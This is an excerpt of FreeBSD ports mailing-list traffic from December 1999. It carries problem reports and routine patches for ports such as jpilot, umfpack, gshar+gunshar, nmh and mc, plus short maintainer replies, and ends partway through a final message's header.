snapple.webct.com (snapple.webct.com [209.87.17.45]) by hub.freebsd.org (Postfix) with ESMTP id 883E015350 for ; Fri, 24 Dec 1999 12:08:07 -0800 (PST) (envelope-from varju@snapple.webct.com) Received: (from root@localhost) by snapple.webct.com (8.9.3/8.9.3) id MAA45817; Fri, 24 Dec 1999 12:08:06 -0800 (PST) (envelope-from varju) Message-Id: <199912242008.MAA45817@snapple.webct.com> Date: Fri, 24 Dec 1999 12:08:06 -0800 (PST) From: Alex Varju Reply-To: varju@snapple.webct.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15671: palm/jpilot port update Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15671 >Category: ports >Synopsis: add plugin support to palm/jpilot port >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 24 12:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Alex Varju >Release: FreeBSD 4.0-CURRENT i386 >Organization: WebCT, Inc. >Environment: >Description: Add support for building jpilot plugins for this port. This will build the libplugin.a and install it. You can then manually build the plugin shared objects and install them if you wish to use them. >How-To-Repeat: >Fix: diff -ruN jpilot/patches/patch-ba jpilot.new/patches/patch-ba --- jpilot/patches/patch-ba Wed Dec 31 16:00:00 1969 +++ jpilot.new/patches/patch-ba Fri Dec 24 11:56:49 1999 @@ -0,0 +1,22 @@ +--- Makefile.in.orig Sun Dec 12 13:23:05 1999 ++++ Makefile.in Fri Dec 24 11:04:06 1999 +@@ -22,7 +22,7 @@ + GTKLIBS = @GTK_LIBS@ + + # Targets +-all: jpilot ++all: jpilot libplugin + + jpilot: jpilot.o datebook.o address.o todo.o memo.o \ + utils.o sync.o prefs.o log.o plugins.o \ +@@ -132,8 +132,10 @@ + ./install-sh -c -m 755 -g bin -o bin empty/AddressDB.pdb $(prefix)/share/jpilot/ + ./install-sh -c -m 755 -g bin -o bin empty/ToDoDB.pdb $(prefix)/share/jpilot/ + ./install-sh -c -m 755 -g bin -o bin empty/MemoDB.pdb $(prefix)/share/jpilot/ ++ ./install-sh -c -m 644 libplugin.a $(prefix)/lib/ + + uninstall: + rm $(prefix)/share/jpilot/* + rm $(prefix)/bin/jpilot + rm $(prefix)/jpilot ++ rm $(prefix)/lib/libplugin.a diff -ruN jpilot/patches/patch-bb jpilot.new/patches/patch-bb --- jpilot/patches/patch-bb Wed Dec 31 16:00:00 1969 +++ jpilot.new/patches/patch-bb Fri Dec 24 11:56:58 1999 @@ -0,0 +1,11 @@ +--- configure.orig Wed Nov 10 09:59:25 1999 ++++ configure Fri Dec 24 10:58:01 1999 +@@ -951,7 +951,7 @@ + echo $ac_n "checking for dlopen""... $ac_c" 1>&6 + echo "configure:953: checking for dlopen" >&5 + save_LIBS="$LIBS" +- LIBS="$LIBS -ldl" ++ LIBS="$LIBS" + cat > conftest.$ac_ext <Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 12:31:18 1999 Delivered-To: freebsd-ports@freebsd.org Received: from news-ma.rhein-neckar.de (news-ma.rhein-neckar.de [193.197.90.3]) by hub.freebsd.org (Postfix) with ESMTP id 7876D151DF for ; Fri, 24 Dec 1999 12:31:12 -0800 (PST) (envelope-from daemon@bigeye.rhein-neckar.de) Received: from bigeye.rhein-neckar.de (uucp@localhost) by news-ma.rhein-neckar.de (8.8.8/8.8.8) with bsmtp id VAA05626 for freebsd-ports@freebsd.org; Fri, 24 Dec 1999 21:31:10 +0100 (CET) (envelope-from daemon@bigeye.rhein-neckar.de) Received: (from daemon@localhost) by bigeye.rhein-neckar.de (8.9.3/8.9.3) id SAA44961 for freebsd-ports@freebsd.org; Fri, 24 Dec 1999 18:43:46 +0100 (CET) (envelope-from daemon) From: naddy@mips.rhein-neckar.de (Christian Weisgerber) Subject: Re: bsd.port.mk: MD5_FILE overrideable or not? Date: 24 Dec 1999 18:43:46 +0100 Message-ID: <840bci$1bsm$1@bigeye.rhein-neckar.de> References: <38636DA5.40D3E5CC@scc.nl> To: freebsd-ports@freebsd.org Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Marcel Moolenaar wrote: > When working on linux_base and linux_devtools I need to create checksums > for both the i386 and the alpha packages. I can do most of the testing > on a single architecture by setting MACHINE_ARCH. I like to have > MACHINE_ARCH appended to the md5 file so that I can use `make makesum' > as well. This is just the kind of situation where the "addsum" target I proposed in PR #15495 (see there for a patch) comes in handy. -- Christian "naddy" Weisgerber naddy@mips.rhein-neckar.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 12:51:39 1999 Delivered-To: freebsd-ports@freebsd.org Received: from germanium.xtalwind.net (germanium.xtalwind.net [205.160.242.5]) by hub.freebsd.org (Postfix) with ESMTP id 212DD15181; Fri, 24 Dec 1999 12:51:34 -0800 (PST) (envelope-from jack@germanium.xtalwind.net) Received: from localhost (jack@localhost) by germanium.xtalwind.net (8.10.0.Beta10/8.10.0.Beta10) with ESMTP id dBOKpVQ30155; Fri, 24 Dec 1999 15:51:31 -0500 (EST) Date: Fri, 24 Dec 1999 15:51:30 -0500 (EST) From: jack To: billf@FreeBSD.org Cc: freebsd-ports@FreeBSD.org Subject: Re: ports/15669: Unbreak ucd-snmp for current In-Reply-To: <199912241953.LAA88652@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Today billf@FreeBSD.org wrote: > Date: Fri, 24 Dec 1999 11:53:46 -0800 (PST) > From: billf@FreeBSD.org > To: jack@germanium.xtalwind.net, billf@FreeBSD.org, freebsd-ports@FreeBSD.org > Subject: Re: ports/15669: Unbreak ucd-snmp for current > > Synopsis: Unbreak ucd-snmp for current > > State-Changed-From-To: open->feedback > State-Changed-By: billf > State-Changed-When: Fri Dec 24 11:51:50 PST 1999 > State-Changed-Why: > These are not all the correct changes. 016.patch exists to fix some > of the problems, and should be used instead of patches/patch-* PATCH_DIST_STRIP is set to ${WRKSRC}/agent for the SMUX patch, 012.patch. 016.patch needs to be applied in ${WRKSRC}. I saw no way to change the directory where vendor patches are applied half way though so I integrated all of the 016.patch into patch-*. Can the working directory for patch be changed between patches? > Also, some recent changes were checked in to ucd-snmp to make > it even smarter about swap space. I know, I wrote them. Arggg. I've been sitting on this for a few weeks so it didn't get lost in the release freeze shuffle. Why don't you just close this PR until I get a chance to incorporate them and I'll resubmit. Any ideas on how to apply different vendor patches in different directories? -------------------------------------------------------------------------- Jack O'Neill Systems Administrator / Systems Analyst jack@germanium.xtalwind.net Crystal Wind Communications, Inc. Finger jack@germanium.xtalwind.net for my PGP key. PGP Key fingerprint = F6 C4 E6 D4 2F 15 A7 67 FD 09 E9 3C 5F CC EB CD enriched, vcard, HTML messages > /dev/null -------------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 13: 5:55 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3E6EF14F36; Fri, 24 Dec 1999 13:05:54 -0800 (PST) (envelope-from billf@FreeBSD.org) Received: (from billf@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA91790; Fri, 24 Dec 1999 13:05:53 -0800 (PST) (envelope-from billf@FreeBSD.org) Date: Fri, 24 Dec 1999 13:05:53 -0800 (PST) From: Message-Id: <199912242105.NAA91790@freefall.freebsd.org> To: jack@germanium.xtalwind.net, billf@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15669: Unbreak ucd-snmp for current Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Unbreak ucd-snmp for current State-Changed-From-To: feedback->closed State-Changed-By: billf State-Changed-When: Fri Dec 24 13:05:35 PST 1999 State-Changed-Why: Patch will be resubmitted. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 13: 6: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id A63E7151B9; Fri, 24 Dec 1999 13:05:58 -0800 (PST) (envelope-from billf@chc-chimes.com) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id E62A71C4D; Fri, 24 Dec 1999 16:05:18 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id E273D381B; Fri, 24 Dec 1999 16:05:18 -0500 (EST) Date: Fri, 24 Dec 1999 16:05:18 -0500 (EST) From: Bill Fumerola To: jack Cc: billf@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15669: Unbreak ucd-snmp for current In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 24 Dec 1999, jack wrote: > PATCH_DIST_STRIP is set to ${WRKSRC}/agent for the SMUX patch, > 012.patch. 016.patch needs to be applied in ${WRKSRC}. I saw no > way to change the directory where vendor patches are applied half > way though so I integrated all of the 016.patch into patch-*. > Can the working directory for patch be changed between patches? Yeah I saw that when I worked on the port to make it more vm-smart. > > Also, some recent changes were checked in to ucd-snmp to make > > it even smarter about swap space. I know, I wrote them. > > Arggg. I've been sitting on this for a few weeks so it didn't > get lost in the release freeze shuffle. Why don't you just close > this PR until I get a chance to incorporate them and I'll > resubmit. Okay, when you resubmit I'll grab it and run it through, I'm relativly familiar with it after working a few hacks into it. > Any ideas on how to apply different vendor patches in different > directories? Gross Hack: copy 012.patch into ${WRKSRC} and then sed(1) and apply it. Solution: No idea. -- - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 13:50:56 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 77CA715173 for ; Fri, 24 Dec 1999 13:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA94639; Fri, 24 Dec 1999 13:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 3B7D51514B; Fri, 24 Dec 1999 13:48:16 -0800 (PST) Message-Id: <19991224214816.3B7D51514B@hub.freebsd.org> Date: Fri, 24 Dec 1999 13:48:16 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15673: Update port: math/umfpack Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15673 >Category: ports >Synopsis: Update port: math/umfpack >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 24 13:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.4-RELEASE i386 >Organization: >Environment: >Description: * Fixed pkg/PLIST >How-To-Repeat: >Fix: diff -urN /usr/ports/math/umfpack/pkg/PLIST math/umfpack/pkg/PLIST --- /usr/ports/math/umfpack/pkg/PLIST Sun Jul 12 03:20:29 1998 +++ math/umfpack/pkg/PLIST Sat Dec 25 06:34:53 1999 @@ -1,2 +1,3 @@ lib/libumfpack.a share/doc/umfpack/README.gz +@dirrm share/doc/umfpack >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 13:50:57 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3B1071515F for ; Fri, 24 Dec 1999 13:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA94630; Fri, 24 Dec 1999 13:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id A9D0B1514B; Fri, 24 Dec 1999 13:47:05 -0800 (PST) Message-Id: <19991224214705.A9D0B1514B@hub.freebsd.org> Date: Fri, 24 Dec 1999 13:47:05 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15672: Update port: archivers/gshar+gunshar to 4.2.1 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15672 >Category: ports >Synopsis: Update port: archivers/gshar+gunshar to 4.2.1 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 24 13:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.4-RELEASE i386 >Organization: >Environment: >Description: * Updated version 4.2 to 4.2.1 * Add WWW: line info pkg/DESCR >How-To-Repeat: >Fix: diff -urN /usr/ports/archivers/gshar+gunshar/Makefile archivers/gshar+gunshar/Makefile --- /usr/ports/archivers/gshar+gunshar/Makefile Wed Aug 25 21:13:40 1999 +++ archivers/gshar+gunshar/Makefile Sat Dec 25 06:45:36 1999 @@ -1,30 +1,24 @@ -# New ports collection makefile for: gshar+gunshar -# Version required: 4.2 -# Date created: 28 Dec 1994 -# Whom: ache +# New ports collection makefile for: gshar+gunshar +# Version required: 4.2.1 +# Date created: 28 Dec 1994 +# Whom: ache # # $FreeBSD: ports/archivers/gshar+gunshar/Makefile,v 1.15 1999/08/25 04:25:06 obrien Exp $ # -DISTNAME= sharutils-4.2 +DISTNAME= sharutils-4.2.1 CATEGORIES= archivers -MASTER_SITES= ${MASTER_SITE_GNU} +MASTER_SITES= ${MASTER_SITE_GNU} MASTER_SITE_SUBDIR= sharutils MAINTAINER= ports@FreeBSD.org -GNU_CONFIGURE= yes -CONFIGURE_ARGS= --program-prefix=g --disable-uucode -INSTALL_TARGET= install install-man +GNU_CONFIGURE= yes +CONFIGURE_ARGS= --program-prefix=g --disable-uucode --disable-nls +INSTALL_TARGET= install install-man MAN1= gshar.1 gunshar.1 -post-patch: - @touch ${WRKSRC}/po/sharutils.pot - post-install: -.for file in gshar gunshar - strip ${PREFIX}/bin/${file} -.endfor .for info in remsync.info sharutils.info install-info ${PREFIX}/info/${info} ${PREFIX}/info/dir .endfor diff -urN /usr/ports/archivers/gshar+gunshar/files/md5 archivers/gshar+gunshar/files/md5 --- /usr/ports/archivers/gshar+gunshar/files/md5 Mon Jun 9 00:00:00 1997 +++ archivers/gshar+gunshar/files/md5 Sat Dec 25 04:57:39 1999 @@ -1 +1 @@ -MD5 (sharutils-4.2.tar.gz) = b1ab1d10d88e8dcb8ee5b0d06b2fc073 +MD5 (sharutils-4.2.1.tar.gz) = b8ba1d409f07edcb335ff72a27bd9828 diff -urN /usr/ports/archivers/gshar+gunshar/pkg/DESCR archivers/gshar+gunshar/pkg/DESCR --- /usr/ports/archivers/gshar+gunshar/pkg/DESCR Fri Jan 23 00:00:00 1998 +++ archivers/gshar+gunshar/pkg/DESCR Sat Dec 25 06:20:43 1999 @@ -6,3 +6,5 @@ is initially derived from public domain. Some modules and other code sections are freely borrowed from other GNU distributions, bringing `shar' under the terms of the GNU General Public License. + +WWW: http://www.gnu.org/software/sharutils/sharutils.html diff -urN /usr/ports/archivers/gshar+gunshar/pkg/PLIST archivers/gshar+gunshar/pkg/PLIST --- /usr/ports/archivers/gshar+gunshar/pkg/PLIST Sun Jun 6 21:10:26 1999 +++ archivers/gshar+gunshar/pkg/PLIST Sat Dec 25 06:10:28 1999 @@ -9,15 +9,3 @@ info/remsync.info @exec install-info %D/info/sharutils.info %D/info/dir @exec install-info %D/info/remsync.info %D/info/dir -lib/locale/de/LC_MESSAGES/sharutils.cat -lib/locale/fr/LC_MESSAGES/sharutils.cat -lib/locale/ja_JP.EUC/LC_MESSAGES/sharutils.cat -lib/locale/nl/LC_MESSAGES/sharutils.cat -lib/locale/pt/LC_MESSAGES/sharutils.cat -lib/locale/sv/LC_MESSAGES/sharutils.cat -share/locale/de.gmo/LC_MESSAGES/sharutils.cat -share/locale/fr.gmo/LC_MESSAGES/sharutils.cat -share/locale/ja_JP.EUC.gmo/LC_MESSAGES/sharutils.cat -share/locale/nl.gmo/LC_MESSAGES/sharutils.cat -share/locale/pt.gmo/LC_MESSAGES/sharutils.cat -share/locale/sv.gmo/LC_MESSAGES/sharutils.cat >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 14:20: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id F00C3150B3 for ; Fri, 24 Dec 1999 14:20:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA99834; Fri, 24 Dec 1999 14:20:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from sabmail.rresearch.com (ip18.gte13.rb1.bel.nwlink.com [207.202.150.18]) by hub.freebsd.org (Postfix) with ESMTP id 94F7214D3A for ; Fri, 24 Dec 1999 14:19:46 -0800 (PST) (envelope-from scott@sabunix.rresearch.com) Received: (from scott@localhost) by sabmail.rresearch.com (8.9.3/8.9.3) id OAA78145; Fri, 24 Dec 1999 14:19:45 -0800 (PST) (envelope-from scott) Message-Id: <199912242219.OAA78145@sabmail.rresearch.com> Date: Fri, 24 Dec 1999 14:19:45 -0800 (PST) From: Scott Blachowicz Reply-To: scott@sabunix.rresearch.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15674: mail/nmh: fix spoolfile locking method Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15674 >Category: ports >Synopsis: fix spoolfile locking method in mail/nmh-1.0.2 port >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 24 14:20:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Scott Blachowicz >Release: FreeBSD 3.2-RELEASE i386 >Organization: none >Environment: FreeBSD 3.x & nmh-1.0.2 port >Description: [not sure how to rate severity or priority...the 'inc' command that reads email from mail spool is basically busted] I was confused creating the most recent nmh port patch and reverted the locking to "dot locking" as I'd thought that sendmail used that. Upon using the new 'inc' command and closer examination of sendmail, then mail.local, it looks like "flock" locking is more appropriate (to match mail.local's behavior). >How-To-Repeat: >Fix: Apply patch to port: diff -urN ../nmh-curr/patches/patch-aa ./patches/patch-aa --- ../nmh-curr/patches/patch-aa Wed Dec 22 19:40:30 1999 +++ ./patches/patch-aa Fri Dec 24 13:50:32 1999 @@ -1,6 +1,18 @@ -diff -ur ../../nmh-1.0.2-DIST/acconfig.h ./acconfig.h ---- ../../nmh-1.0.2-DIST/acconfig.h Thu Oct 21 11:58:09 1999 -+++ ./acconfig.h Sat Dec 11 11:54:28 1999 +--- ../../../nmh-1.0.2-DIST/acconfig.h Thu Oct 21 11:58:09 1999 ++++ ./acconfig.h Fri Dec 24 13:50:12 1999 +@@ -22,10 +22,10 @@ + * other programs which may modify your maildrops. + * Currently you can only use one type. + */ +-#define DOT_LOCKING 1 ++/* #define DOT_LOCKING 1 */ + /* #define FCNTL_LOCKING 1 */ + /* #define LOCKF_LOCKING 1 */ +-/* #define FLOCK_LOCKING 1 */ ++#define FLOCK_LOCKING 1 + + /* + * If you have defined DOT_LOCKING, then the default is to @@ -104,7 +104,7 @@ * The prefix which is prepended to the name of messages when they * are "removed" by rmm. This should typically be `,' or `#' >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 15:20: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 670BD1509C for ; Fri, 24 Dec 1999 15:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA02649; Fri, 24 Dec 1999 15:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pele.WURLDLINK.NET (pele.WURLDLINK.NET [208.164.68.2]) by hub.freebsd.org (Postfix) with ESMTP id EB6D814D1C for ; Fri, 24 Dec 1999 15:18:09 -0800 (PST) (envelope-from vince@pele.WURLDLINK.NET) Received: (from root@localhost) by pele.WURLDLINK.NET (8.9.3/8.9.3) id NAA87450; Fri, 24 Dec 1999 13:18:14 -1000 (HST) (envelope-from vince) Message-Id: <199912242318.NAA87450@pele.WURLDLINK.NET> Date: Fri, 24 Dec 1999 13:18:14 -1000 (HST) From: Vincent Poy Reply-To: vince@pele.WURLDLINK.NET To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15675: problems fetching fd port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15675 >Category: ports >Synopsis: problems fetching fd port >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 24 15:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Vincent Poy >Release: FreeBSD 4.0-CURRENT i386 >Organization: Wurldlink Corporation - San Francisco - Honolulu - Hong Kong >Environment: 4.0-CURRENT and 3.3-RELEASE >Description: problems fetching fd port - it's extremely difficult to fetch the sources archive for the fd port. >How-To-Repeat: trying to build the port, manually fetching and ftp >Fix: This port probably needs to have the archive mirrored somewhere so in case the master site fails, the port will build from fetching elsewhere. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 16:10: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id ED7AD150BD for ; Fri, 24 Dec 1999 16:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA04458; Fri, 24 Dec 1999 16:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pele.WURLDLINK.NET (pele.WURLDLINK.NET [208.164.68.2]) by hub.freebsd.org (Postfix) with ESMTP id D125E14DD5; Fri, 24 Dec 1999 16:02:18 -0800 (PST) (envelope-from vince@pele.WURLDLINK.NET) Received: (from root@localhost) by pele.WURLDLINK.NET (8.9.3/8.9.3) id OAA98032; Fri, 24 Dec 1999 14:02:23 -1000 (HST) (envelope-from vince) Message-Id: <199912250002.OAA98032@pele.WURLDLINK.NET> Date: Fri, 24 Dec 1999 14:02:23 -1000 (HST) From: Vincent Poy Reply-To: vince@pele.WURLDLINK.NET To: FreeBSD-gnats-submit@freebsd.org Cc: nakai@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15676: mc port build fails after commit by nakai Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15676 >Category: ports >Synopsis: mc port build fails after commit by nakai >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Dec 24 16:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Vincent Poy >Release: FreeBSD 4.0-CURRENT i386 >Organization: Wurldlink Corporation - San Francisco - Honolulu - Hong Kong >Environment: 4.0-CURRENT and 3.3-RELEASE >Description: mc port build fails after commit by nakai >How-To-Repeat: root@victor [3:50pm][/usr/ports/misc/mc] >> make clean ; make install ===> Cleaning for gettext-0.10.35 ===> Cleaning for libtool-1.3.3 ===> Cleaning for glib-1.2.6 ===> Cleaning for libtool-1.3.3 ===> Cleaning for gmake-3.78.1 ===> Cleaning for mc-4.5.42 ===> Extracting for mc-4.5.42 >Fix: Unknown >Release-Note: >Audit-Trail: >Unformatted: >> Checksum OK for mc-4.5.42.tar.gz. ===> mc-4.5.42 depends on executable: gmake - found ===> mc-4.5.42 depends on shared library: glib12.3 - found ===> mc-4.5.42 depends on shared library: intl.1 - found ===> Patching for mc-4.5.42 ===> Applying FreeBSD patches for mc-4.5.42 1 out of 2 hunks failed--saving rejects to vfs/extfs/uzip.in.rej *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 16:30: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CD87914D7C for ; Fri, 24 Dec 1999 16:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA05304; Fri, 24 Dec 1999 16:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Fri, 24 Dec 1999 16:30:02 -0800 (PST) Message-Id: <199912250030.QAA05304@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Chris Piazza Subject: Re: ports/15676: mc port build fails after commit by nakai Reply-To: Chris Piazza Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15676; it has been noted by GNATS. From: Chris Piazza To: Vincent Poy Cc: FreeBSD-gnats-submit@FreeBSD.ORG, nakai@FreeBSD.ORG Subject: Re: ports/15676: mc port build fails after commit by nakai Date: Fri, 24 Dec 1999 16:20:25 -0800 On Fri, Dec 24, 1999 at 02:02:23PM -1000, Vincent Poy wrote: > 1 out of 2 hunks failed--saving rejects to vfs/extfs/uzip.in.rej This patch should fix your problem. It appears that the author(s) of this program fixed it in a different way. Index: patches/patch-ai =================================================================== RCS file: /home/ncvs/ports/misc/mc/patches/patch-ai,v retrieving revision 1.2 diff -u -r1.2 patch-ai --- patches/patch-ai 1999/12/23 18:37:52 1.2 +++ patches/patch-ai 1999/12/25 00:20:11 @@ -9,12 +9,3 @@ XZIP="$DZIP/zip -g" XDZIP="$DZIP/zip -d" XUNZIP="$DZIP/unzip" -@@ -67,7 +67,7 @@ - if ($8 ~ /\/$/) - printf "drwxr-xr-x 1 %-8d %-8d %8d %s %s %s\n", uid, 0, $1, $5, $6, $8 - else -- printf "-rw-r--r-- 1 %-8d %-8d %8d %s %s %s\n", uid, 0, $1, $5, $6, substr($0, index($0, $7) + length($7 " ") -+ printf "-rw-r--r-- 1 %-8d %-8d %8d %s %s %s\n", uid, 0, $1, $5, $6, substr($0, index($0, $7) + length($7 " ")) - }' 2>/dev/null - fi - } -Chris -- cpiazza@jaxon.net cpiazza@FreeBSD.org Abbotsford, BC, Canada To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 17:22:17 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mls.gtonet.net (mls.gtonet.net [216.112.90.195]) by hub.freebsd.org (Postfix) with ESMTP id AA79E14D03; Fri, 24 Dec 1999 17:22:11 -0800 (PST) (envelope-from freebsd@gtonet.net) Received: from pld (holeyman@pld.gtonet.net [216.112.90.200]) by mls.gtonet.net (8.9.3/8.9.3) with SMTP id RAA25783; Fri, 24 Dec 1999 17:22:03 -0800 (PST) (envelope-from freebsd@gtonet.net) From: "FreeBSD" To: "Dan Nelson" , "FreeBSD" Cc: "freebsd-stable@FreeBSD. ORG" , , Subject: RE: broken port... Date: Fri, 24 Dec 1999 17:22:27 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-reply-to: <19991224120457.A38490@dan.emsphone.com> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > -----Original Message----- > From: 